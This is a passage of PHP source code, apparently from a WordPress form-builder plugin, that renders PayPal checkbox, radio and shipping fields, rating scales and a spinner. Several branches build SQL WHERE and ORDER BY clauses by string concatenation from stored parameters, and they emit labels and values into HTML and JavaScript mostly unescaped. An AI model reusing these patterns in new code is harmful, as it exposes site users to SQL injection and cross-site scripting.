							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_quantity_label'.$form_id.'\"  />").val("Quantity").appendTo("#adminForm");

								';

						$onsubmit_js.='

							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_property_label'.$form_id.'\"  />").val("'.$param['w_property'][0].'").appendTo("#adminForm");

								';

			

					

						break;

					}
            
            case 'type_paypal_checkbox':

					{

					

							if($element_value == '')

								$element_value =' :';

											

							$params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class','w_property','w_property_values','w_quantity');

							$temp=$params;

							if(strpos($temp, 'w_field_option_pos') > -1)

								$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_choices_params', 'w_class','w_property','w_property_values','w_quantity');	

							foreach($params_names as $params_name )

							{	

								$temp=explode('*:*'.$params_name.'*:*',$temp);

								$param[$params_name] = $temp[0];

								$temp=$temp[1];

							}

							

							

							if($temp)

							{	

								$temp	=explode('*:*w_attr_name*:*',$temp);

								$attrs	= array_slice($temp,0, count($temp)-1);   

								foreach($attrs as $attr)

									$param['attributes'] = $param['attributes'].' '.$attr;

							}

							

						

							if(!isset($param['w_field_option_pos']))

								$param['w_field_option_pos'] = 'left';

					

							$param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	

							$param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");

							$param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none !important;'" : "");

							$param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin-right: 8px !important; display: inline-block !important;'" : "");

						

							

							$param['w_choices']	= explode('***',$param['w_choices']);

							$param['w_choices_price']	= explode('***',$param['w_choices_price']);

							

							$param['w_property']	= explode('***',$param['w_property']);

							$param['w_property_values']	= explode('***',$param['w_property_values']);

							if(isset($param['w_choices_params']))

								$param['w_choices_params'] = explode('***',$param['w_choices_params']);

							

							$rep='<div type="type_paypal_checkbox" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';

							

							$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';">';

						

			

										if(strpos($element_value,'***br***') !== false)

										{	

											$element_value	= explode('***br***',$element_value);	

											foreach($element_value as $key => $element)	

											{

											

												if(strpos($element,'***quantity***') !== false)

												{

													$quantity_value = explode(': ',str_replace("***quantity***","",$element));

													$quantity_value =  $quantity_value[1];

													unset($element_value[$key]);

												}

												else

												if(strpos($element,'***property***') !== false)

												{

													$property_of_check = explode(': ',str_replace("***property***","",$element));

													$property_of_check = $property_of_check[1];

													unset($element_value[$key]);

												}

												else

												{	

													for($m=0; $m<strlen($element); $m++)

													{

														if(!ctype_digit($element[strlen($element)-1]))

															$element_value[$key] = substr($element,0,-1);

														else

															break;

													}

													$quantity_value = '';

													$property_of_check = '';

												}

												

											}

										}

										else

										{

											$element_value	= explode(' :',$element_value);

											$choise_value = preg_replace("/[^0-9]/","",$element_value[1]);

											$quantity_value = '';

											$property_of_check = '';

										}			

					

							$total_queries = 0;

							foreach($param['w_choices'] as $key => $choice)

							{

								$key1 = $key + $total_queries;

								if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])

								{

									$choices_labels = array();
									$choices_values = array();
									
									$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
									$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
									$w_choices_params = explode('[db_info]',$w_choices_params[1]);
									
									$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
									$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
								
									$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));

									$table = $label_table_and_column[0];

									$label_column = $label_table_and_column[1];

									if($label_column)

									{

										$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);
									}	



									$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));

									$value_column = $value_table_and_column[1];



									if($value_column)

									{

										$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);

									}		

									

									$columns_count = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);

									

									if(array_filter($choices_labels) || array_filter($choices_values))

									{

										$total_queries = $total_queries + $columns_count-1;

										

											

										for($k=0; $k<$columns_count; $k++)

										{

											$choice_label = isset($choices_labels) ? $choices_labels[$k] : '';

											$choice_value = isset($choices_values) ? (float)$choices_values[$k] : '';

											

											$checked=(in_array($choice_label.' - '.$choice_value, $element_value)=='true' ? 'checked="checked"' : '');

											

											$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label.'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" value="'.$choice_value.'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div><input type="hidden" name="wdform_'.$id1.'_element'.$form_id.($key1+$k).'_label" value="'.htmlspecialchars($choice_label).'" /></div>';

											

											

										}

									}	

								}

								else

								{

									$checked=(in_array($choice.' - '.$param['w_choices_price'][$key], $element_value)=='true' ? 'checked="checked"' : '');

									

									$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.''.$key1.'" value="'.$param['w_choices_price'][$key].'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div><input type="hidden" name="wdform_'.$id1.'_element'.$form_id.$key1.'_label" value="'.htmlspecialchars($choice).'" /></div>';

								}

							}

					

							$rep.='<div id="wdform_'.$id1.'_div'.$form_id.'">';

							if($param['w_quantity']=="yes")

								$rep.='<div class="paypal-property"><label class="mini_label" style="margin: 0px 5px;">Quantity</label><input type="text" value="'.($quantity_value == '' ? 1 : $quantity_value).'" id="wdform_'.$id1.'_element_quantity'.$form_id.'" name="wdform_'.$id1.'_element_quantity'.$form_id.'" class="wdform-quantity"></div>';

								

							if($param['w_property'][0])					

							foreach($param['w_property'] as $key => $property)

							{



							$rep.='

							<div class="paypal-property">

							<div style="width:150px; display:inline-block;">

							<label class="mini_label" id="wdform_'.$id1.'_property_label_'.$form_id.''.$key.'" style="margin-right: 5px;">'.$property.'</label>

							<select id="wdform_'.$id1.'_property'.$form_id.''.$key.'" name="wdform_'.$id1.'_property'.$form_id.''.$key.'" style="width: 100%; margin: 2px 0px;">';

							$param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);

							$param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   

							foreach($param['w_property_values'][$key] as $subkey => $property_value)

							{

								$rep.='<option id="wdform_'.$id1.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'" '.($property_of_check==$property_value ? 'selected="selected"' : "").'>'.$property_value.'</option>';

							}

							$rep.='</select></div></div>';

							}

							

							$rep.='</div></div></div>';

							

							$onsubmit_js.='

							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_quantity_label'.$form_id.'\"  />").val("Quantity").appendTo("#adminForm");

							';

							$onsubmit_js.='

							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_property_label'.$form_id.'\"  />").val("'.$param['w_property'][0].'").appendTo("#adminForm");

							';		

			

						break;

					}

            case 'type_paypal_radio':

					{

					

						if($element_value=='')

							$element_value = ' :';

						

							$params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class','w_property','w_property_values','w_quantity');

							$temp=$params;



							if(strpos($temp, 'w_field_option_pos') > -1)

								$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_choices_params', 'w_class', 'w_property','w_property_values','w_quantity');

								

							foreach($params_names as $params_name )

							{	

								$temp=explode('*:*'.$params_name.'*:*',$temp);

								$param[$params_name] = $temp[0];

								$temp=$temp[1];

							}



							if($temp)

							{	

								$temp	=explode('*:*w_attr_name*:*',$temp);

								$attrs	= array_slice($temp,0, count($temp)-1);   

								foreach($attrs as $attr)

									$param['attributes'] = $param['attributes'].' '.$attr;

							}

							if(!isset($param['w_field_option_pos']))

								$param['w_field_option_pos'] = 'left';



							$param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	

							$param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");

							$param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none !important;'" : "");

							$param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin-right: 8px !important; display: inline-block !important;'" : "");

							

							$param['w_choices']	= explode('***',$param['w_choices']);

							$param['w_choices_price']	= explode('***',$param['w_choices_price']);

							

							$param['w_property']	= explode('***',$param['w_property']);

							$param['w_property_values']	= explode('***',$param['w_property_values']);

							if(isset($param['w_choices_params']))

								$param['w_choices_params'] = explode('***',$param['w_choices_params']);	

								

							$rep='<div type="type_paypal_radio" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';

						

							$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';">';

		

							if(strpos($element_value,'***br***') !== false)

							{	

								$element_value	= explode('***br***',$element_value);

								if(count($element_value)==2)

								{

									if(strpos($element_value[1],'***quantity***') !== false)

									{

										$quantity_value = explode(': ',str_replace("***quantity***","",$element_value[1]));

										$quantity_value = $quantity_value[1];

										$property_of_radio = '';

									}

									else

									{

										$quantity_value = '' ;

										$property_of_radio = explode(': ',str_replace("***property***","",$element_value[1]));

										$property_of_radio = $property_of_radio[1];

									}

									

									$element_value	= explode(' :',$element_value[0]);

									$choise_value = preg_replace("/[^0-9]/","",$element_value[1]);

								}

								else

								{

									$quantity_value = explode(': ',str_replace("***quantity***","",$element_value[1]));

									$quantity_value = $quantity_value[1];

									$property_of_radio = explode(': ',str_replace("***property***","",$element_value[2]));

									$property_of_radio = $property_of_radio[1];

								

									$element_value	= explode(' :',$element_value[0]);

									$choise_value = preg_replace("/[^0-9]/","",$element_value[1]);

								}

							}

							else

							{

								$element_value	= explode(' :',$element_value);

								$choise_value = preg_replace("/[^0-9]/","",$element_value[1]);

								$quantity_value = '';

								$property_of_radio = '';

							}

							$total_queries = 0;

							foreach($param['w_choices'] as $key => $choice)

							{

								$key1 = $key + $total_queries;

								if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])

								{

									$choices_labels =array();
									$choices_values =array();
									$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
									$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
									$w_choices_params = explode('[db_info]',$w_choices_params[1]);
									
									$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
									$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
				

									$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));

									$table = $label_table_and_column[0];

									$label_column = $label_table_and_column[1];

									if($label_column)

									{

										$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);
									}	



									$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));

									$value_column = $value_table_and_column[1];



									if($value_column)

									{

										$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);

									}		



									$columns_count_radio = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);

									

									if(array_filter($choices_labels) || array_filter($choices_values))

									{

										$total_queries = $total_queries + $columns_count_radio-1;

										for($k=0; $k<$columns_count_radio; $k++)

										{	

											$choice_label = isset($choices_labels) ? $choices_labels[$k] : '';

											$choice_value = isset($choices_values) ? (float)$choices_values[$k] : '';

					

											if($element_value[0] == $choice_label && $choice_value == $choise_value)

												$checked = 'checked="checked"';

											else

												$checked = '';

					

					

											$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'">'.$choice_label.'</label><div class="radio-div forlabs"><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$choice_value.'" title="'.htmlspecialchars($choice_label).'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';

				

										}

									}			

								}

								else

								{

									if($element_value[0] == $choice && $param['w_choices_price'][$key] == $choise_value)

										$checked = 'checked="checked"';

									else

										$checked = '';

										

									$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'">'.$choice.'</label><div class="radio-div forlabs"><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$param['w_choices_price'][$key].'" title="'.htmlspecialchars($choice).'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';

								}

							

							}



							$rep.='<div id="wdform_'.$id1.'_div'.$form_id.'">';

							if($param['w_quantity']=="yes")

								$rep.='<div class="paypal-property"><label class="mini_label" style="margin: 0px 5px;">Quantity</label><input type="text" value="'.($quantity_value=='' ? 1 : $quantity_value).'" id="wdform_'.$id1.'_element_quantity'.$form_id.'" name="wdform_'.$id1.'_element_quantity'.$form_id.'" class="wdform-quantity"></div>';

								

							if($param['w_property'][0])					

							foreach($param['w_property'] as $key => $property)

							{



							$rep.='

							<div class="paypal-property">

							<div style="width:150px; display:inline-block;">

							<label class="mini_label" id="wdform_'.$id1.'_property_label_'.$form_id.''.$key.'" style="margin-right: 5px;">'.$property.'</label>

							<select id="wdform_'.$id1.'_property'.$form_id.''.$key.'" name="wdform_'.$id1.'_property'.$form_id.''.$key.'" style="width: 100%; margin: 2px 0px;">';

							$param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);

							$param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   

							foreach($param['w_property_values'][$key] as $subkey => $property_value)

							{

								$rep.='<option id="wdform_'.$id1.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'" '.($property_of_radio==$property_value ? 'selected="selected"' : "").'>'.$property_value.'</option>';

							}

							$rep.='</select></div></div>';

							}

							

							$rep.='</div></div></div>';

								

						

							$onsubmit_js.='

								jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_label'.$form_id.'\" />").val(

								jQuery("label[for=\'"+jQuery("input[name^=\'wdform_'.$id1.'_element'.$form_id.'\']:checked").prop("id")+"\']").eq(0).text()

								).appendTo("#adminForm");



								';

							$onsubmit_js.='

								jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_quantity_label'.$form_id.'\"  />").val("Quantity").appendTo("#adminForm");

										';

							$onsubmit_js.='

								jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_property_label'.$form_id.'\"  />").val("'.$param['w_property'][0].'").appendTo("#adminForm");

										';	

						break;

					}
            

            case 'type_paypal_shipping':

					{

					

						if($element_value=='')

							$element_value =' - ';

		

							$params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');

							$temp=$params;



							if(strpos($temp, 'w_field_option_pos') > -1)

							$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_choices_params', 'w_class');

							foreach($params_names as $params_name )

							{	

								$temp=explode('*:*'.$params_name.'*:*',$temp); 

								$param[$params_name] = $temp[0];

								$temp=$temp[1];

							}

							

							if($temp)

							{	

								$temp	=explode('*:*w_attr_name*:*',$temp);

								$attrs	= array_slice($temp,0, count($temp)-1);   

								foreach($attrs as $attr)

									$param['attributes'] = $param['attributes'].' '.$attr;

							}

							

							if(!isset($param['w_field_option_pos']))

								$param['w_field_option_pos'] = 'left';

								

							$param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");

							$param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none !important;'" : "");

							$param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin-right: 8px !important; display: inline-block !important;'" : "");

							

							

							$param['w_choices']	= explode('***',$param['w_choices']);

							$param['w_choices_price']	= explode('***',$param['w_choices_price']);

							if(isset($param['w_choices_params']))

								$param['w_choices_params'] = explode('***',$param['w_choices_params']);	

						

							

							

							$element_value	= explode(' - ',$element_value);

							$element_value[1] = preg_replace("/[^0-9]/","",$element_value[1]);

								

							$rep='<div type="type_paypal_shipping" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';

						

							$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';">';

							

							$total_queries = 0;

							foreach($param['w_choices'] as $key => $choice)

							{

								$key1 = $key + $total_queries;

								if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])

								{			

									$choices_labels =array();
									$choices_values =array();
									$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
									$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
									$w_choices_params = explode('[db_info]',$w_choices_params[1]);
									
									$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
									$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
				
									
									$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));

									$table = $label_table_and_column[0];

									$label_column = $label_table_and_column[1];

									if($label_column)

									{

										$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);
									}	



									$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));

									$value_column = $value_table_and_column[1];



									if($value_column)

									{

										$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);

									}		



									$columns_count_shipping = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);

									

									if(array_filter($choices_labels) || array_filter($choices_values))

									{

										$total_queries = $total_queries + $columns_count_shipping-1;

										for($k=0; $k<$columns_count_shipping; $k++)

										{

											$choice_label = isset($choices_labels) ? $choices_labels[$k] : '';

											$choice_value = isset($choices_values) ? (float)$choices_values[$k] : '';

						

											$checked =(($choice_label==$element_value[0] && $choice_value== $element_value[1]) ? 'checked="checked"' : '');



											$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'">'.$choice_label.'</label><div class="radio-div forlabs"><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$choice_value.'" title="'.htmlspecialchars($choice_label).'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';

										}	

									}	

								}

								else

								{

									$checked =(($choice==$element_value[0] && $param['w_choices_price'][$key]== $element_value[1]) ? 'checked="checked"' : '');

									

									$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'">'.$choice.'</label><div class="radio-div forlabs"><input type="radio" id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$param['w_choices_price'][$key].'" title="'.htmlspecialchars($choice).'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';

								}

							}



							$rep.='</div></div>';



						

							$onsubmit_js.='

								jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_label'.$form_id.'\" />").val(

								jQuery("label[for=\'"+jQuery("input[name^=\'wdform_'.$id1.'_element'.$form_id.'\']:checked").prop("id")+"\']").eq(0).text()

								).appendTo("#adminForm");



								';

				

						break;

					}
            
            case 'type_star_rating': { 					
              if($element_value=='')
                $element_value = '/'; 
                
                $params_names = array('w_field_label_size','w_field_label_pos','w_field_label_col','w_star_amount','w_required','w_class');
                $temp = $params;
                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }

                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
                          $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                
                $element_value = explode('/', $element_value);
        
                $images = '';	
                for($i=0; $i<$element_value[1]; $i++) {
                  $images .= '<img id="wdform_'.$id1.'_star_'.$i.'_'.$form_id.'" src="' . WD_FMC_URL . '/images/star.png" >';
                  
                  $onload_js .='jQuery("#wdform_'.$id1.'_star_'.$i.'_'.$form_id.'").mouseover(function() {change_src('.$i.',"wdform_'.$id1.'", "'.$form_id.'", "'.$param['w_field_label_col'].'");});';
                  $onload_js .='jQuery("#wdform_'.$id1.'_star_'.$i.'_'.$form_id.'").mouseout(function() {reset_src('.$i.',"wdform_'.$id1.'", "'.$form_id.'");});';
                  $onload_js .='jQuery("#wdform_'.$id1.'_star_'.$i.'_'.$form_id.'").click(function() {select_star_rating('.$i.',"wdform_'.$id1.'", "'.$form_id.'","'.$param['w_field_label_col'].'", "'.$element_value[1].'");});';
                  $onload_js .='select_star_rating('.($element_value[0]-1).',"wdform_'.$id1.'", "'.$form_id.'","'.$param['w_field_label_col'].'", "'.$element_value[1].'");';
                }
                
                $rep ='<div type="type_star_rating" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos'].'"><div id="wdform_'.$id1.'_element'.$form_id.'" '.$param['attributes'].'>'.$images.'</div><input type="hidden" value="" id="wdform_'.$id1.'_selected_star_amount'.$form_id.'" name="wdform_'.$id1.'_selected_star_amount'.$form_id.'"></div></div>';
                
            
                $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_star_amount'.$form_id.'\" value = \"'.$param['w_star_amount'].'\" />").appendTo("#form'.$form_id.'");
                ';

              break;
            }
            case 'type_scale_rating': {
            
              if($element_value=='')
                $element_value = '/';
                
                $params_names=array('w_field_label_size','w_field_label_pos','w_mini_labels','w_scale_amount','w_required','w_class');
                $temp=$params;
                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }

                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
                          $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                
                $element_value = explode('/',$element_value);
                $w_mini_labels = explode('***',$param['w_mini_labels']);
                
                $numbers = '';	
                $radio_buttons = '';	
                $to_check=0;
                $to_check=$element_value[0];

                for($i=1; $i<=$element_value[1]; $i++) {
                  $numbers.= '<div  style="text-align: center; display: table-cell;"><span>'.$i.'</span></div>';
                  $radio_buttons.= '<div style="text-align: center; display: table-cell;"><div class="radio-div"><input id="wdform_'.$id1.'_scale_radio'.$form_id.'_'.$i.'" name="wdform_'.$id1.'_scale_radio'.$form_id.'" value="'.$i.'" type="radio" '.( $to_check==$i ? 'checked="checked"' : '' ).'><label for="wdform_'.$id1.'_scale_radio'.$form_id.'_'.$i.'"></label></div></div>';
                }
        
                $rep ='<div type="type_scale_rating" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                 
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos'].'"><div id="wdform_'.$id1.'_element'.$form_id.'" style="float: left;" '.$param['attributes'].'><label class="mini_label">'.$w_mini_labels[0].'</label><div  style="display: inline-table; vertical-align: middle;border-spacing: 7px;"><div style="display: table-row;">'.$numbers.'</div><div style="display: table-row;">'.$radio_buttons.'</div></div><label class="mini_label" >'.$w_mini_labels[1].'</label></div></div></div>';
                 
                $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_scale_amount'.$form_id.'\" value = \"'.$param['w_scale_amount'].'\" />").appendTo("#form'.$form_id.'");
                ';
              
                break;
            }
            
            case 'type_spinner': {
              
                $params_names=array('w_field_label_size','w_field_label_pos','w_field_width','w_field_min_value','w_field_max_value', 'w_field_step', 'w_field_value', 'w_required','w_class');
                $temp=$params;
                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }

                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
                          $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                
                
                $rep ='<div type="type_spinner" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos'].'"><input type="text" value="'.($element_value!= 'null' ? $element_value : '').'" name="wdform_'.$id1.'_element'.$form_id.'" id="wdform_'.$id1.'_element'.$form_id.'" style="width: '.$param['w_field_width'].'px;" '.$param['attributes'].'></div></div>';
                
                $onload_js .='
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'")[0].spin = null;
                  spinner = jQuery("#wdform_'.$id1.'_element'.$form_id.'").spinner();
                  spinner.spinner( "value", "'.($element_value!= 'null' ? $element_value : '').'");
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").spinner({ min: "'.$param['w_field_min_value'].'"});    
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").spinner({ max: "'.$param['w_field_max_value'].'"});
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").spinner({ step: "'.$param['w_field_step'].'"});
                ';
              
              break;
            }
            
            case 'type_slider': {
            
                $params_names=array('w_field_label_size','w_field_label_pos','w_field_width','w_field_min_value','w_field_max_value', 'w_field_value', 'w_required','w_class');
                $temp=$params;
                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }

                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                
                
                $rep ='<div type="type_slider" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                
                 
